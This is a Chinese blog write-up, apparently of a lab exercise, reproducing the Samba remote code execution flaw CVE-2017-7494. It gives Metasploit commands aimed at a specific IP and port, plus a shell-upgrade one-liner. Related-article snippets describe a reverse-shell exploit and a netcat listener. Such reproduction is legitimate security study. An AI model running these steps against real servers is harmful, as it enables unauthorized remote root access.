【漏洞复现】Samba 远程命令执行（CVE-2017-7494）

？？？？27282

已于 2022-09-11 13:54:00 修改

阅读量1.6k

点赞数 1

CC 4.0 BY-SA版权

分类专栏：优秀文章秀秀文章标签：网络 linux 安全

于 2022-08-13 15:54:08 首次发布

本文链接：https://blog.csdn.net/qq_52549196/article/details/126320436

优秀文章同时被 2 个专栏收录

166 篇文章 ¥9.90 ¥99.00

订阅专栏

秀秀

179 篇文章

订阅专栏

本文介绍了2017年Samba的重大远程代码执行漏洞CVE-2017-7494，该漏洞影响多个Samba版本。漏洞允许攻击者在受影响的Samba服务器上执行任意代码，通过445或特定端口如65249进行利用。Samba作为Linux和Windows之间资源共享的桥梁，此安全问题凸显了其重要性。

漏洞介绍

2017年5月24日Samba发布了4.6.4版本，中间修复了一个严重的远程代码执行漏洞，漏洞编号CVE-2017-7494，漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。属于严重漏洞，可以造成远程代码执行。

Samba实现Windows主机与Linux服务器之间的资源共享，Linux操作系统提供了Samba服务，Samba服务为两种不同的操作系统架起了一座桥梁，使Linux系统和Windows系统之间能够实现互相通信

服务器一般运行着Samba服务在445端口

本案例Samba服务在65249端口

msf

search cve-2017-7494
use 0
info
set rhosts 123.58.224.8
set  rport  65249
run
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

了解本专栏

订阅专栏解锁全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

？？？？27282

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

2021-08-29 网安实验-Linux系统渗透测试之Samba远程代码执行

时光隧道

08-29

4万+

Samba源码安装及环境配置，对漏洞进行简单分析。在攻击机上使用nmap检测靶机开放的端口和服务，Samba服务需开启445端口： nmap 10.1.1.100 可以看到目标主机139和445端口均已开启，139端口作用为获得smb服务，说明目标主机有可能存在Samba服务。漏洞利用的exp文件位于/usr/share/metasploit-framework/modules/exploits/linux/samba/中：启动metasploit： msfconsole 查找i

Samba远程代码执行漏洞复现-CVE-2017-7494

weixin_48128812的博客

12-02

3699

一、概述 Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本，中间修复了一个严重的远程代码执行漏洞，漏洞编号CVE-2017-7494，漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。二、漏洞影响版本 Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。三、漏洞利用条件 1、服务器打开了文件/打印机共享端口445 2、共享文件拥有访问以及写入权限 3、攻击者知道

参与评论您还未登录，请先登录后发表或查看评论

Samba远程代码执行漏洞

bocco的博客

02-14

1884

近日，安全狗应急响应中心监测Linuxsamba被露出远程代码执行漏洞，漏洞编号CVE-2021-44142。可导致恶意用户远程代码执行等危害。

CVE-2017-7494:SAMBA CVE-2017-7494漏洞的远程根漏洞利用

05-06

CVE-2017-7494 SAMBA CVE-2017-7494漏洞的远程根漏洞利用。细节此漏洞利用分为两个部分：首先，它编译一个称为“ implant.c”的有效负载，并生成一个库（libimplantx32.so或libimplantx64.so），该库更改为root用户，与父进程分离并生成一个反向shell。其次，它在指定的目标主机中找到可写共享，并使用随机名称上传库并尝试加载它。只要目标是易受攻击的，并且有效负载对目标操作系统和体系结构而言是正确的，则漏洞利用程序是100％可靠的。如何在您的机器上，运行以下命令： $ nc -p 31337 -l 然后，针对您的目标运行该漏洞利用，并等待其连接回您的Netcat： $ python cve_2017_7494.py -t target_ip 如果您关闭反向外壳的速度过快，则无需再次运行利用漏洞上传模块等.

利用Samba远程代码执行漏洞(CVE-2017-7494)获取shell

最新发布

NatusVincere

04-02

1185

use exploit/linux/samba/is_known_pipename（选择要使用的脚本）如果不知道靶机IP可以在靶机中输入ifconfig即可查看ip，一般eth0下的IP即为靶机IP。漏洞文件的位置在vulhub/samba/CVE-2017-7494下。search CVE-2017-7494（搜索漏洞编号，查找漏洞脚本）在该文件夹下右键打开控制台窗口，或者cd到该文件夹下。set rhost IP（设置为靶机的IP即可）。run（进行攻击），攻击完成后寻找flag。

Samba远程代码执行-分析(CVE-2017-7494)

weixin_30925411的博客

07-08

233

经历了前一阵windows的EternalBlue之后，某天看见了360的 samba高危预警，这个号称linux端的EternalBlue（EternalRed），于是便研究了一波概述(抄) Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本，中间修复了一个严重的远程代码执行漏洞，漏洞编号CVE-2017-7494，漏洞影响了S...

Samba远程代码执行漏洞(CVE-2017-7494)复现

m0_48520508的博客

01-06

2701

0x00简介 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件，由服务器及客户端程序构成。SMB（Server Messages Block，信息服务块）是一种在局域网上共享文件和打印机的一种通信协议，它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议，客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源，还能与全世界的电脑分享资源。 0x

CVE-2017-7494漏洞的分析与复现（Linux永恒之蓝）

dgjkkhcf的博客

07-20

5380

2017年5月24日Samba发布了4.6.4版本，中间修复了一个严重的远程代码执行漏洞，漏洞编号CVE-2017-7494，漏洞影响了Samba3.5.0之后到4.6.4/4.5.10/4.4.14中间的所有版本。360网络安全中心和360信息安全部的GearTeam第一时间对该漏洞进行了分析，确认属于严重漏洞，可以造成远程代码执行。...

三、漏洞编号为CVE-2017-7494的复现（永恒之蓝）（Linux）（Ubuntu16.04.4）

qwsn

10-15

4424

一、漏洞分析 1.漏洞别名： CVE-2017-7494称为Linux版的永恒之蓝 2.漏洞用来做什么：该漏洞用来，远程反弹shell并提权 3.漏洞适合的环境： Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。 //也就是Samba 3.5.0之后的所有版本，在4.6.4/4.5.10/4.4.14修复了这个漏洞。二、漏洞环境复现 1.相关信息： ①IP地址...

Samba 远程命令执行漏洞（CVE-2017-7494）

EC_Carrot的博客

07-26

602

漏洞简介 Samba允许连接一个远程的命名管道，并且在连接前会调用is_known_pipename()函数验证管道名称是否合法。在is_known_pipename()函数中，并没有检查管道名称中的特殊字符，加载了使用该名称的动态链接库。导致攻击者可以构造一个恶意的动态链接库文件，执行任意代码。影响范围 Samba 4.6.3 漏洞复现在vulhub的环境内，新版metasploit可能无法复现这个漏洞，真是太可惜了，我们使用另外一个POC来复现使用命令: ./exploit.py -t your-

Linux Samba远程代码执行漏洞(CVE-2017-7494)漏洞复现

我是网络安全兼技能大赛工程师，专注网络安全技术学习与技能大赛实战！持续分享最新的技术文章，帮你少走弯路，一起在技术赛道上进步～

05-29

2836

1.该漏洞CVE-2017-7494又被称为Linux版的永恒之蓝 2.主要是利用smb上的反弹shell漏洞，进行远程代码执行 3.samba3.5.0 到4.6.4/4.5.10/4.4.14的中间版本、docker

使用CVE-2017-7494漏洞实现Samba远程代码执行

我是网络安全兼技能大赛工程师，专注网络安全技术学习与技能大赛实战！持续分享最新的技术文章，帮你少走弯路，一起在技术赛道上进步～

04-22

4629

在CTF比赛中，常见的比赛环境分为两种： 1.给予在同一局域网中的攻击机和靶场机器，通常以Web、Misc（杂项）、Android（移动安全）、Crypto（密码学）、Pwn（溢出题）、Reverse（逆向）可以访问攻击机，通过攻击机来渗透靶场机器，获取对应的flag值，（在一般情况下赛事举办方会提供Kali Linux作为攻击机，并且举办方提供计算机硬件设备，无需选手携带电脑即可参加）常见于国内的各种线上线下网络安全竞赛当中，常见模式有：攻防模式：参赛者分为两队，每队都分配一个计算环境——可能仅仅

Linux版SMB远程代码执行漏洞(CVE-2017-7494)-SambaCry 分析报告

counsellor的专栏

05-31

7871

背景2017年5月24日Samba官方发布了安全公告，在Samba 3.5.0 以后的版本中存在严重的代码执行漏洞(CVE-2017-7494)。在rpc_server/srv_pipe.c中的存在一个验证BUG，攻击者可以利用客户端上传恶意动态库文件到具有可写权限的共享目录中，之后发出请求，使服务器加载Samba运行目录以外的非法模块，导致恶意代码执行。漏洞公告=========== Descr

Samba远程代码执行漏洞(CVE-2017-7494)分析

weixin_34301307的博客

08-01

901

概述 2017年5月24日Samba发布了4.6.4版本，中间修复了一个严重的远程代码执行漏洞，漏洞编号CVE-2017-7494，漏洞影响了Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间的版本。360网络安全中心和 360信息安全部的Gear Team第一时间对该漏洞进行了分析，确认属于严重漏洞，可以造成远程代码执行...

CVE 2017-7494 Samba远程代码执行漏洞

BROTHERYY的博客

10-20

1027

1. 漏洞描述 Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录，会导致服务器加载并执行指定的库文件。以下Samba版本受到影响： – 3.5.0- 4.6.4 – 3.5.0- 4.5.10 – 3.5.0- 4.4.14 2. 复现环境靶机：使用vulhub进行环境搭建攻击机：kali 3. 漏洞复现 1.运行测试环境 docker-compose up -d 2.使用kali msf框架 msf5 > use exploit/lin

linux samba漏洞,Samba远程代码执行漏洞(CVE-2017-7494)

weixin_30141959的博客

05-17

419

SambaSamba实现Windows主机与Linux服务器之间的资源共享，Linux操作系统提供了Samba服务，Samba服务为两种不同的操作系统架起了一座桥梁，使Linux系统和Windows系统之间能够实现互相通信漏洞介绍CVE-2017-7494，2017年5月24日Samba发布了4.6.4版本，修复严重的远程代码执行漏洞，该漏洞影响了Samba 3.5.0 之后到4.6.4/4.5....

linux smb 漏洞_Samba远程代码执行漏洞的实例详解

weixin_34887221的博客

12-23

1574

Samba是在Linux和UNIX系统上实现SMB协议的一个软件。2017年5月24日Samba发布了4.6.4版本，中间修复了一个严重的远程代码执行漏洞，漏洞编号CVE-2017-7494，漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。360网络安全中心和 360信息安全部的Gear Team第一时间对该漏洞进行了分析，确认属于严重漏洞，可以造成...

cve-2017-7494复现

f1gure的博客

03-29

1941

首先是靶机配置：开始攻击：成功。

深入解析SAMBA CVE-2017-7494远程根漏洞利用方法

CVE-2017-7494是一个远程根漏洞，存在于SAMBA软件中。SAMBA是一个使Unix/Linux系统能够与Windows网络进行通信的开源软件，它允许用户通过网络共享文件和打印机。这个漏洞允许攻击者通过发送特制的网络消息来执行任意...